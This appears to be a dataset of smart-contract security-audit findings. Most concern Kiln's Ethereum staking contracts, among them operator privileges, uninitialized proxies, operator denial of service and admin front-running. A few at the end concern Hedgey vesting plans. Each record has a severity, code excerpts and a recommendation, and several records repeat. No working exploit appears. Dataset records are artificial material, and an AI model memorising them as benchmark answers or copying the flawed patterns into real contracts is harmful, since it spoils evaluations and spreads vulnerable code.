For instance, checking against a min - max limit, like 20% - 40%.чч```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n -Contracts Should Inherit From Their InterfacesчlowчThe following contracts should enforce correct interface implementation by inheriting from the interface declarations.\\n```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n\\n```\\ninterface IStakingContractFeeDetails {\\n function getWithdrawerFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (address);\\n\\n function getTreasury() external view returns (address);\\n\\n function getOperatorFeeRecipient(bytes32 pubKeyRoot) external view returns (address);\\n\\n function getGlobalFee() external view returns (uint256);\\n\\n function getOperatorFee() external view returns (uint256);\\n\\n function getExitRequestedFromRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function getWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function toggleWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external;\\n}\\n```\\n\\n```\\ninterface IFeeRecipient {\\n function init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external;\\n\\n function withdraw() external;\\n}\\n```\\nчInherit from interface.чч```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n -Misleading Error StatementsчlowчThe contracts define custom errors 
to revert transactions on failed operations or invalid input, however, they convey little to no information, making it difficult for the off-chain monitoring tools to track relevant updates.\\n```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n\\nFor instance, the `init` modifier is used to initialize the contracts with the current Version. The Version initialization ensures that the provided version must be an increment of the previous version, if not, it reverts with an error as `AlreadyInitialized()`. However, the error doesn't convey an appropriate message correctly, as any version other than the expected version will signify that the version has already been initialized.\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != StakingContractStorageLib.getVersion() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\nчUse a more meaningful statement with enough information to track off-chain for all the custom errors in every contract in scope. 
For instance, add the current and supplied versions as indexed parameters, like: IncorrectVersionInitialization(current version, supplied version);\\nAlso, the function can be simplified as\\n```\\n function initELD(address \\_stakingContract) external init(VERSION\\_SLOT.getUint256() + 1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n }\\n```\\nчч```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n -Incorrect Priviliges setOperatorAddresses AcknowledgedчhighчThe function `setOperatorAddresses` instead of allowing the Operator to update its own, as well as the Fee Recipient address, incorrectly provides the privileges to the Fee Recipient. As a result, the Fee Recipient can modify the operator address as and when needed, to DoS the operator and exploit the system. 
Additionally, upon reviewing the documentation, we found that there are no administrative rights defined for the Fee Recipient, hence highlighting the incorrect privilege allocation.\\n```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\nчThe modifier should be `onlyActiveOperatorOrAdmin` allowing only the operator itself or admin of the system, to update the necessary addresses.\\nAlso, for transferring crucial privileges from one address to another, the operator's address should follow a 2-step approach like transferring ownership.чч```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n -Unconstrained Snapshot While Setting Operator LimitчmediumчFunction `setOperatorLimit` as the name says, allows the `SYS_ADMIN` to set/update the staking limit for an operator. 
The function ensures that if the limit is being increased, the `_snapshot` must be ahead of the last validator edit(block.number at which the last validator edit occurred). However, the parameter `_snapshot` is unconstrained and can be any number. Also, the functions `addValidators` and `removeValidators` update the `block.number` signifying the last validator edit, but never constrain the new edits with it. Since there are no publicly available functions to access this value, makes the functionality even more confusing and may be unnecessary.\\n```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\nчIf the functionality is not needed, consider removing it. Otherwise, add some necessary logic to either constrain the last validator edit or add public functions for the users to access it.чч```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n -Hardcoded Operator Limit LogicчmediumчThe contract defines some hardcoded limits which is not the right approach for upgradeable contracts and opens doors for accidental mistakes, if not handled with care.\\nThe operators for the current version are limited to 1. 
If the auditee team decides to open the system to work with more operators but fails to change the limit while upgrading, the upgraded contract will have no effect, and will still disallow any more operators to be added.\\n```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n\\nAlso, the function `_depositOnOneOperator` hardcodes the operator Index as 0 since the contract only supports one operator.\\n```\\nfunction \\_depositOnOneOperator(uint256 \\_depositCount, uint256 \\_totalAvailableValidators) internal {\\n StakingContractStorageLib.setTotalAvailableValidators(\\_totalAvailableValidators - \\_depositCount);\\n \\_depositValidatorsOfOperator(0, \\_depositCount);\\n}\\n```\\nчA better approach could be to constrain the limit of operators that can be added with a storage variable or constant, provided at the time of contract initialization. The contract should also consider supporting dynamic operator deposits for future versions instead of the default hardcoded index.чч```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n -StakingContract - PubKey Length Checks Not Always Enforcedчmediumч`addValidators` checks that the provided `bytes pubKey` is a multiple of the expected pubkey length while functions like `setWithdrawer` do not enforce similar length checks. 
This is an inconsistency that should be avoided.\\n`addValidators` enforcing input length checks\\n```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n\\n`setWithdrawer` accepting any length for a `pubKey`. Note that `_getPubKeyRoot` will take any input provided and concat it the zero bytes.\\n```\\n/// @notice Set withdrawer for public key\\n/// @dev Only callable by current public key withdrawer\\n/// @param \\_publicKey Public key to change withdrawer\\n/// @param \\_newWithdrawer New withdrawer address\\nfunction setWithdrawer(bytes calldata \\_publicKey, address \\_newWithdrawer) external {\\n if (!StakingContractStorageLib.getWithdrawerCustomizationEnabled()) {\\n revert Forbidden();\\n }\\n \\_checkAddress(\\_newWithdrawer);\\n bytes32 pubkeyRoot = \\_getPubKeyRoot(\\_publicKey);\\n StakingContractStorageLib.WithdrawersSlot storage withdrawers = StakingContractStorageLib.getWithdrawers();\\n\\n if (withdrawers.value[pubkeyRoot] != msg.sender) {\\n revert Unauthorized();\\n }\\n\\n emit ChangedWithdrawer(\\_publicKey, \\_newWithdrawer);\\n\\n withdrawers.value[pubkeyRoot] = \\_newWithdrawer;\\n}\\n```\\n\\n```\\nfunction \\_getPubKeyRoot(bytes memory \\_publicKey) internal pure returns (bytes32) {\\n return sha256(abi.encodePacked(\\_publicKey, bytes16(0)));\\n}\\n```\\n\\nsimilarly, the withdraw family of functions does not enforce a pubkey length either. 
However, it is unlikely that someone finds a pubkey that matches a root for the attackers address.\\n```\\n/// @notice Withdraw the Execution Layer Fee for a given validator public key\\n/// @dev Funds are sent to the withdrawer account\\n/// @param \\_publicKey Validator to withdraw Execution Layer Fees from\\nfunction withdrawELFee(bytes calldata \\_publicKey) external {\\n \\_onlyWithdrawerOrAdmin(\\_publicKey);\\n \\_deployAndWithdraw(\\_publicKey, EXECUTION\\_LAYER\\_SALT\\_PREFIX, StakingContractStorageLib.getELDispatcher());\\n}\\n```\\n\\nNevertheless, the methods should be hardened so as not to give a malicious actor the freedom to use an unexpected input size for the `pubKey` argument.чEnforce pubkey length checks when accepting a single pubkey as bytes similar to the batch functions that check for a multiple of ´PUBLIC_KEY_LENGTH´. Alternatively, declare the function argument as `bytes48` (however, in this case inputs may be auto-padded to fit the expected length, pot. covering situations that otherwise would throw an error)чч```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n -Unpredictable Behavior Due to Admin Front Running or General Bad TimingчmediumчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. 
This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nSome instances of this are more important than others, but in general, users of the system should have assurances about the behavior of the action they're about to take.\\nUpgradeable TU proxy\\nFee changes take effect immediately\\n```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n\\n```\\n/// @notice Change the Global fee\\n/// @param \\_globalFee Fee in Basis Point\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. 
The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.чч```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n -Potentially Uninitialized ImplementationsчmediumчMost contracts in the system are meant to be used with a proxy pattern. First, the implementations are deployed, and then proxies are deployed that delegatecall into the respective implementations following an initialization call (hardhat, with same transaction). However, the implementations are neither initialized explicitly nor protected from other actors claiming/initializing them. This allows anyone to call initialization functions on implementations for use with phishing attacks (i.e. contract implementation addresses are typically listed on the official project website as valid contracts) which may affect the reputation of the system.\\nNone of the implementations allow unprotected delegatecalls or selfdestructs,
lowering the severity of this finding.\\n```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n\\n```\\n/// @notice Initializes the receiver\\n/// @param \\_dispatcher Address that will handle the fee dispatching\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n stakingContract = msg.sender; // The staking contract always calls init\\n}\\n```\\n\\n```\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n}\\n```\\nчPetrify contracts in the constructor and disallow other actors from claiming/initializing the implementations.чч```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n -Operator May DoS the Withdrawal or Make It More ExpensiveчmediumчWhile collecting fees, the operator may:\\ncause DoS for the funds/rewards withdrawal by reverting the call, thus reverting the whole transaction. 
By doing this, it won't be receiving any rewards, but neither will the treasury and withdrawer.\\nmake the withdrawal more expensive by sending a huge chunk of `returndata`. As the `returndata` is copied into memory in the caller's context, it will add an extra gas overhead for the withdrawer making it more expensive.\\nor mint gas token\\n```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}(\"\");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\nчA possible solution could be to make a low-level call in an inline assembly block, restricting the `returndata` to a couple of bytes, and instead of reverting on the failed call, emit an event, flagging the call that failed.чч```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}(\"\");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n -ConsensusLayerFeeDispatcher/ExecutionLayerFeeDispatcher - Should Hardcode autoPetrify With Highest Initializable Version Instead of User Provided ArgumentчlowчThe version to auto-initialize is not hardcoded with the constructor.
On deployment, the deployer may accidentally use the wrong version, allowing anyone to call `initialize` on the contract.\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n\\n/// @notice Initialize the contract by storing the staking contract and the public key in storage\\n/// @param \\_stakingContract Address of the Staking Contract\\nfunction initELD(address \\_stakingContract) external init(1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n}\\n```\\nчSimilar to the `init(1)` modifier, it is suggested to track the highest version as a `const int` with the contract and auto-initialize to the highest version in the constructor instead of taking the highest version as a deployment argument.чч```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n -StakingContract - Misleading CommentчlowчThe comment notes that the expected caller is `admin` while the modifier checks that `msg.sender` is an active operator.\\n```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\nчRectify the comment to accurately describe the intention of the method/modifier.чч```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n -Impractical Checks for Global/Operator Fees and the Commission LimitsчlowчThe contract initialization sets 
up the global and operator fees and also their commission limits. However, the checks just make sure that the fees or commission limit is up to 100% which is not a very practical check. Any unusual value, for instance, if set to 100% will mean the whole rewards/funds will be non-exempted and taxed as global fees, which we believe will never be a case practically.\\n```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n\\n```\\nfunction initialize\\_2(uint256 globalCommissionLimitBPS, uint256 operatorCommissionLimitBPS) public init(2) {\\n if (globalCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalCommissionLimit(globalCommissionLimitBPS);\\n if (operatorCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorCommissionLimit(operatorCommissionLimitBPS);\\n}\\n```\\n\\n```\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n\\n```\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\nчThe fees should be checked with a more practical limit. 
For instance, checking against a min - max limit, like 20% - 40%.чч```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n -Contracts Should Inherit From Their InterfacesчlowчThe following contracts should enforce correct interface implementation by inheriting from the interface declarations.\\n```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n\\n```\\ninterface IStakingContractFeeDetails {\\n function getWithdrawerFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (address);\\n\\n function getTreasury() external view returns (address);\\n\\n function getOperatorFeeRecipient(bytes32 pubKeyRoot) external view returns (address);\\n\\n function getGlobalFee() external view returns (uint256);\\n\\n function getOperatorFee() external view returns (uint256);\\n\\n function getExitRequestedFromRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function getWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function toggleWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external;\\n}\\n```\\n\\n```\\ninterface IFeeRecipient {\\n function init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external;\\n\\n function withdraw() external;\\n}\\n```\\nчInherit from interface.чч```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n -Misleading Error StatementsчlowчThe contracts define custom errors 
to revert transactions on failed operations or invalid input, however, they convey little to no information, making it difficult for the off-chain monitoring tools to track relevant updates.\\n```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n\\nFor instance, the `init` modifier is used to initialize the contracts with the current Version. The Version initialization ensures that the provided version must be an increment of the previous version, if not, it reverts with an error as `AlreadyInitialized()`. However, the error doesn't convey an appropriate message correctly, as any version other than the expected version will signify that the version has already been initialized.\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != StakingContractStorageLib.getVersion() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\nчUse a more meaningful statement with enough information to track off-chain for all the custom errors in every contract in scope. 
For instance, add the current and supplied versions as indexed parameters, like: IncorrectVersionInitialization(current version, supplied version);\\nAlso, the function can be simplified as\\n```\\n function initELD(address \\_stakingContract) external init(VERSION\\_SLOT.getUint256() + 1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n }\\n```\\nчч```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n -Architectural Pattern of Internal and External Functions Increases Attack SurfaceчlowчThere is an architectural pattern throughout the code of functions being defined in two places: an external wrapper (name) that verifies authorization and validates parameters, and an internal function (_name) that contains the implementation logic. 
This pattern separates concerns and avoids redundancy in the case that more than one external function reuses the same internal logic.\\nFor example, `VotingTokenLockupPlans.setupVoting` calls an internal function `_setupVoting` and sets the `holder` parameter to `msg.sender`.\\n```\\nfunction setupVoting(uint256 planId) external nonReentrant returns (address votingVault) {\\n votingVault = \\_setupVoting(msg.sender, planId);\\n```\\n\\n```\\nfunction \\_setupVoting(address holder, uint256 planId) internal returns (address) {\\n require(ownerOf(planId) == holder, '!owner');\\n```\\n\\nIn this case, however, there is no case in which `holder` should not be set to `msg.sender`. Because the internal function doesn't enforce this, it's theoretically possible that if another internal (or derived) function were compromised then it could call `_setupVoting` with `holder` set to `ownerOf(planId)`, even if `msg.sender` isn't the owner. This increases the attack surface through providing unneeded flexibility.\\nOther Examples\\n```\\nfunction segmentPlan(\\n uint256 planId,\\n uint256[] memory segmentAmounts\\n) external nonReentrant returns (uint256[] memory newPlanIds) {\\n newPlanIds = new uint256[](segmentAmounts.length);\\n for (uint256 i; i < segmentAmounts.length; i++) {\\n uint256 newPlanId = \\_segmentPlan(msg.sender, planId, segmentAmounts[i]);\\n```\\n\\n```\\nfunction \\_segmentPlan(address holder, uint256 planId, uint256 segmentAmount) internal returns (uint256 newPlanId) {\\n require(ownerOf(planId) == holder, '!owner');\\n```\\n\\n```\\nfunction revokePlans(uint256[] memory planIds) external nonReentrant {\\n for (uint256 i; i < planIds.length; i++) {\\n \\_revokePlan(msg.sender, planIds[i]);\\n```\\n\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n```\\nчResolution\\nFixed as of commit 
`f4299cdba5e863c9ca2d69a3a7dd554ac34af292`.\\nTo reduce the attack surface, consider hard coding parameters such as `holder` to `msg.sender` in internal functions when extra flexibility isn't needed.чч```\\nfunction setupVoting(uint256 planId) external nonReentrant returns (address votingVault) {\\n votingVault = \\_setupVoting(msg.sender, planId);\\n```\\n -Revoking Vesting Will Trigger a Taxable EventчlowчResolution\\nFixed as of commit `f4299cdba5e863c9ca2d69a3a7dd554ac34af292`.\\nFrom the previous conversations with the Hedgey team, we identified that users should be in control of when taxable events happen. For that reason, one could redeem a plan in the past. Unfortunately, the recipient of the vesting plan can not always be in control of the redemption process. If for one reason or another the administrator of the vesting plan decides to revoke it, any vested funds will be sent to the vesting plan holder, triggering the taxable event and burning the NFT.\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n\\n```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n address vault 
= votingVaults[planId];\\n if (vault == address(0)) {\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n } else {\\n delete votingVaults[planId];\\n VotingVault(vault).withdrawTokens(vestingAdmin, remainder);\\n VotingVault(vault).withdrawTokens(holder, balance);\\n }\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\nчOne potential workaround is to only withdraw the unvested portion to the vesting admin while keeping the vested part in the contract. That being said `amount` and `rate` variables would need to be updated in order not to allow any additional vesting for the given plan. This way plan holders will not be entitled to more funds but will be able to redeem them at the time they choose.чч```\\nfunction \\_revokePlan(address vestingAdmin, uint256 planId) internal {\\n Plan memory plan = plans[planId];\\n require(vestingAdmin == plan.vestingAdmin, '!vestingAdmin');\\n (uint256 balance, uint256 remainder, ) = planBalanceOf(planId, block.timestamp, block.timestamp);\\n 